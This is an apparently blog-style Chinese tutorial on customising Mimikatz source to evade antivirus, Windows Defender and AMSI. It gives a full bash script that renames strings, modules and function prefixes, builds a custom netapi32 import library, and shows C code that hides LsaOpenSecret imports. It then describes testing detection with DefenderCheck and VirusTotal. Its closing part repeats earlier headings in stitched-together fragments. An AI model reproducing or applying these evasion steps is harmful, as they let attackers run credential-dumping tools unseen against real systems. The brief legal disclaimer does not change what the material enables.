手工绕过AMSI：定制Mimikatz二进制文件完全指南<\/h1>

0x00 前言<\/h2>
本教程详细讲解如何通过修改Mimikatz源代码来构建定制化的二进制文件，以绕过AV\/EDR的检测。我们将从基本特征修改开始，逐步深入到更高级的混淆技术。<\/p>

0x01 为什么需要定制Mimikatz<\/h2>

原始Mimikatz二进制文件几乎被所有AV标记<\/li>
直接从GitHub下载的发布版本会被拦截<\/li>
定制化可以显著降低检测率<\/li>
可以只保留需要的功能模块<\/li>

能够绕过AMSI和其他安全机制<\/li> <\/ul>

0x02 基本特征修改<\/h2>

必须替换的关键字符串<\/h3>

以下字符串是Mimikatz最明显的特征，必须全部替换：<\/p>

mimikatz, MIMIKATZ, Mimikatz
DELPY, Benjamin, benjamin@gentilkiwi.com
creativecommons
gentilkiwi
KIWI, Kiwi, kiwi
<\/code><\/pre>
修改Banner信息<\/h3>
原始Banner包含以下特征信息，需要修改或删除：<\/p>
"A La Vie, A L'Amour"
http:\/\/blog.gentilkiwi.com\/mimikatz
Vincent LE TOUX
vincent.letoux@gmail.com
http:\/\/pingcastle.com
http:\/\/mysmartlogon.com
<\/code><\/pre>
修改方法：直接编辑mimikatz.c<\/code>文件中的Banner部分。<\/p>
0x03 功能模块名称修改<\/h2>
Mimikatz主要功能模块包括：<\/p>
crypto, dpapi, kerberos, lsadump, ngc, sekurlsa
standard, privilege, process, service, ts, event
misc, token, vault, minesweeper, net, busylight
sysenv, sid, iis, rpc, sr98, rdm, acr
<\/code><\/pre>
修改策略有两种选择：<\/p>

随机大小写化<\/strong>：如crypto<\/code> → CryPto<\/code><\/li>
完全替换<\/strong>：如crypto<\/code> → cccccc<\/code><\/li>
<\/ol>
建议使用第一种方法，便于记忆和使用。<\/p>
0x04 子功能名称修改<\/h2>
常用模块的子功能也需要修改，例如sekurlsa<\/code>的子功能：<\/p>
msv, wdigest, kerberos, tspkg
livessp, cloudap, ssp, logonpasswords
process, minidump, bootkey, pth
krbtgt, dpapisystem, trust, backupkeys
tickets, ekeys, dpapi, credman
<\/code><\/pre>
0x05 自动化修改脚本<\/h2>
使用以下bash脚本自动化替换关键字符串：<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>
<\/span><\/span># 克隆并重命名项目<\/span>
<\/span><\/span>git clone https:\/\/github.com\/gentilkiwi\/mimikatz.git windows
<\/span><\/span>mv windows\/mimikatz windows\/windows
<\/span><\/span>
<\/span><\/span># 替换基本字符串<\/span>
<\/span><\/span>find windows\/ -type f -print0 | xargs -0 sed -i 's\/mimikatz\/windows\/g'<\/span>
<\/span><\/span>find windows\/ -type f -print0 | xargs -0 sed -i 's\/MIMIKATZ\/WINDOWS\/g'<\/span>
<\/span><\/span>find windows\/ -type f -print0 | xargs -0 sed -i 's\/Mimikatz\/Windows\/g'<\/span>
<\/span><\/span>find windows\/ -type f -print0 | xargs -0 sed -i 's\/DELPY\/James\/g'<\/span>
<\/span><\/span>find windows\/ -type f -print0 | xargs -0 sed -i 's\/Benjamin\/Troy\/g'<\/span>
<\/span><\/span>find windows\/ -type f -print0 | xargs -0 sed -i 's\/benjamin@gentilkiwi.com\/jtroy@hotmail.com\/g'<\/span>
<\/span><\/span>find windows\/ -type f -print0 | xargs -0 sed -i 's\/creativecommons\/python\/g'<\/span>
<\/span><\/span>find windows\/ -type f -print0 | xargs -0 sed -i 's\/gentilkiwi\/MSOffice\/g'<\/span>
<\/span><\/span>find windows\/ -type f -print0 | xargs -0 sed -i 's\/KIWI\/ONEDRIVE\/g'<\/span>
<\/span><\/span>find windows\/ -type f -print0 | xargs -0 sed -i 's\/Kiwi\/Onedrive\/g'<\/span>
<\/span><\/span>find windows\/ -type f -print0 | xargs -0 sed -i 's\/kiwi\/onedrive\/g'<\/span>
<\/span><\/span>
<\/span><\/span># 重命名文件和目录<\/span>
<\/span><\/span>find windows\/ -type f -name '*mimikatz*'<\/span> | while<\/span> read FILE ; do<\/span> newfile=<\/span>"<\/span>$(<\/span>echo ${<\/span>FILE}<\/span> | sed -e 's\/mimikatz\/windows\/g'<\/span>)<\/span>"<\/span>; mv "<\/span>${<\/span>FILE}<\/span>"<\/span> "<\/span>${<\/span>newfile}<\/span>"<\/span>; done<\/span>
<\/span><\/span>find windows\/ -type f -name '*kiwi*'<\/span> | while<\/span> read FILE ; do<\/span> newfile=<\/span>"<\/span>$(<\/span>echo ${<\/span>FILE}<\/span> | sed -e 's\/kiwi\/onedrive\/g'<\/span>)<\/span>"<\/span>; mv "<\/span>${<\/span>FILE}<\/span>"<\/span> "<\/span>${<\/span>newfile}<\/span>"<\/span>; done<\/span>
<\/span><\/span>
<\/span><\/span># 替换函数前缀<\/span>
<\/span><\/span>kuhl=<\/span>$(<\/span>cat \/dev\/urandom | tr -dc "a-z"<\/span> | fold -w 4<\/span> | head -n 1)<\/span>
<\/span><\/span>find windows\/ -type f -print0 | xargs -0 sed -i "s\/kuhl\/<\/span>$kuhl\/g"<\/span>
<\/span><\/span>kull=<\/span>$(<\/span>cat \/dev\/urandom | tr -dc "a-z"<\/span> | fold -w 4<\/span> | head -n 1)<\/span>
<\/span><\/span>find windows\/ -type f -print0 | xargs -0 sed -i "s\/kull\/<\/span>$kull\/g"<\/span>
<\/span><\/span>
<\/span><\/span># 重命名函数前缀文件<\/span>
<\/span><\/span>find windows\/ -type f -name "*kuhl*"<\/span> | while<\/span> read FILE ; do<\/span> newfile=<\/span>"<\/span>$(<\/span>echo ${<\/span>FILE}<\/span> | sed -e "s\/kuhl\/<\/span>$kuhl\/g"<\/span>)<\/span>"<\/span>; mv "<\/span>${<\/span>FILE}<\/span>"<\/span> "<\/span>${<\/span>newfile}<\/span>"<\/span>; done<\/span>
<\/span><\/span>find windows\/ -type f -name "*kull*"<\/span> | while<\/span> read FILE ; do<\/span> newfile=<\/span>"<\/span>$(<\/span>echo ${<\/span>FILE}<\/span> | sed -e "s\/kull\/<\/span>$kull\/g"<\/span>)<\/span>"<\/span>; mv "<\/span>${<\/span>FILE}<\/span>"<\/span> "<\/span>${<\/span>newfile}<\/span>"<\/span>; done<\/span>
<\/span><\/span>
<\/span><\/span># 替换其他特征<\/span>
<\/span><\/span>under=<\/span>$(<\/span>cat \/dev\/urandom | tr -dc "a-z"<\/span> | fold -w 4<\/span> | head -n 1)<\/span>
<\/span><\/span>find windows\/ -type f -print0 | xargs -0 sed -i "s\/_m_\/<\/span>$under\/g"<\/span>
<\/span><\/span>find windows\/ -type f -name "*_m_*"<\/span> | while<\/span> read FILE ; do<\/span> newfile=<\/span>"<\/span>$(<\/span>echo ${<\/span>FILE}<\/span> | sed -e "s\/_m_\/<\/span>$under\/g"<\/span>)<\/span>"<\/span>; mv "<\/span>${<\/span>FILE}<\/span>"<\/span> "<\/span>${<\/span>newfile}<\/span>"<\/span>; done<\/span>
<\/span><\/span><\/code><\/pre>0x06 处理netapi32.dll问题<\/h2>
Defender会标记netapi32.dll中的以下函数：<\/p>
I_NetServerAuthenticate2
I_NetServerReqChallenge
I_NetServerTrustPasswordsGet
<\/code><\/pre>
解决方法：<\/p>

创建netapi32.def<\/code>文件：<\/li>
<\/ol>
LIBRARY netapi32.dll
EXPORTS
I_NetServerAuthenticate2 @59
I_NetServerReqChallenge @65
I_NetServerTrustPasswordsGet @62
<\/code><\/pre>

使用Visual Studio开发者控制台构建自定义库：<\/li>
<\/ol>
lib \/DEF:netapi32.def \/OUT:netapi32.min.lib
<\/code><\/pre>

将生成的netapi32.min.lib<\/code>放入lib\x64\<\/code>目录<\/li>
重新编译项目<\/li>
<\/ol>
0x07 替换更多特征字符串<\/h2>
需要替换的其他关键字符串：<\/p>
功能描述字符串<\/h3>
"Switch to MINIDUMP", "Switch to PROCESS"
"UndefinedLogonType", "NetworkCleartext", "NewCredentials"
"RemoteInteractive", "CachedInteractive", "CachedRemoteInteractive"
"CachedUnlock", "DPAPI_SYSTEM", "replacing NTLM\/RC4 key in a session"
"Token Impersonation", "UsernameForPacked", "LSA Isolated Data"
<\/code><\/pre>
标准模块字符串<\/h3>
"isBase64InterceptInput", "isBase64InterceptOutput"
"Credential Guard may be running", "SecureKernel is running"
<\/code><\/pre>
DLL文件名<\/h3>
搜索项目中所有.dll<\/code>引用并替换：<\/p>
advapi32.dll
crypt32.dll
ncrypt.dll
wldap32.dll
...
<\/code><\/pre>
0x08 高级混淆技术<\/h2>
1. API导入隐藏<\/h3>
示例：隐藏LSAOpenSecret<\/code> API<\/p>
typedef<\/span> NTSTATUS<\/span>(__stdcall<\/span>*<\/span> _LsaOSecret)(__in LSA_HANDLE PolicyHandle, __in PLSA_UNICODE_STRING SecretName, __in ACCESS_MASK DesiredAccess, __out PLSA_HANDLE SecretHandle);
<\/span><\/span>
<\/span><\/span>char<\/span> hid_LsaLIB_02zmeaakLCHt[] =<\/span> {'a'<\/span>,'d'<\/span>,'v'<\/span>,'a'<\/span>,'p'<\/span>,'i'<\/span>,'3'<\/span>,'2'<\/span>,'.'<\/span>,'D'<\/span>,'L'<\/span>,'L'<\/span>,0<\/span>};
<\/span><\/span>char<\/span> hid_LsaOSecr_BZxlW5ZBUAAe[] =<\/span> {'L'<\/span>,'s'<\/span>,'a'<\/span>,'O'<\/span>,'p'<\/span>,'e'<\/span>,'n'<\/span>,'S'<\/span>,'e'<\/span>,'c'<\/span>,'e'<\/span>,'t'<\/span>,0<\/span>};
<\/span><\/span>
<\/span><\/span>HANDLE hhid_LsaLIB_asdasdasd =<\/span> LoadLibrary(hid_LsaLIB_02zmeaakLCHt);
<\/span><\/span>_LsaOSecret ffLsaOSecret =<\/span> (_LsaOSecret)GetProcAddress(hhid_LsaLIB_asdasdasd, hid_LsaOSecr_BZxlW5ZBUAAe);
<\/span><\/span><\/code><\/pre>2. 错误信息修改<\/h3>
删除或修改详细的错误信息输出，减少特征。<\/p>
3. 其他高级技术<\/h3>

Syscall内联<\/li>
Shellcode注入<\/li>
移除用户级别Hook<\/li>
生成多态可执行文件<\/li>
<\/ul>
0x09 编译与测试<\/h2>

使用Visual Studio编译修改后的项目<\/li>
使用DefenderCheck检查二进制文件特征：<\/li>
<\/ol>
DefenderCheck.exe mimikatz.exe
<\/code><\/pre>

上传到VirusTotal验证检测率<\/li>
<\/ol>
0x0A 结论<\/h2>
通过本教程的方法，可以：<\/p>

显著降低Mimikatz的AV检测率<\/li>
绕过Windows Defender的实时保护<\/li>
创建独特的二进制文件变体<\/li>
根据需要定制功能模块<\/li>
<\/ol>
最终生成的定制化Mimikatz二进制文件不会触发AMSI，可以安全地集成到各种工具中，如：<\/p>

Invoke-ReflectivePEINjection<\/li>
subTee的C# PE-Loader<\/li>
<\/ul>
记住，安全研究仅用于合法授权测试，请遵守当地法律法规。<\/p>

手工绕过AMSI：定制Mimikatz二进制文件完全指南<\/h1>

0x00 前言<\/h2> 本教程详细讲解如何通过修改Mimikatz源代码来构建定制化的二进制文件，以绕过AV\/EDR的检测。我们将从基本特征修改开始，逐步深入到更高级的混淆技术。<\/p>

0x02 基本特征修改<\/h2>

0x07 替换更多特征字符串<\/h2> 需要替换的其他关键字符串：<\/p>

0x08 高级混淆技术<\/h2>

2. 错误信息修改<\/h3> 删除或修改详细的错误信息输出，减少特征。<\/p>

0x00 前言<\/h2>
本教程详细讲解如何通过修改Mimikatz源代码来构建定制化的二进制文件，以绕过AV\/EDR的检测。我们将从基本特征修改开始，逐步深入到更高级的混淆技术。<\/p>

0x07 替换更多特征字符串<\/h2>
需要替换的其他关键字符串：<\/p>

2. 错误信息修改<\/h3>
删除或修改详细的错误信息输出，减少特征。<\/p>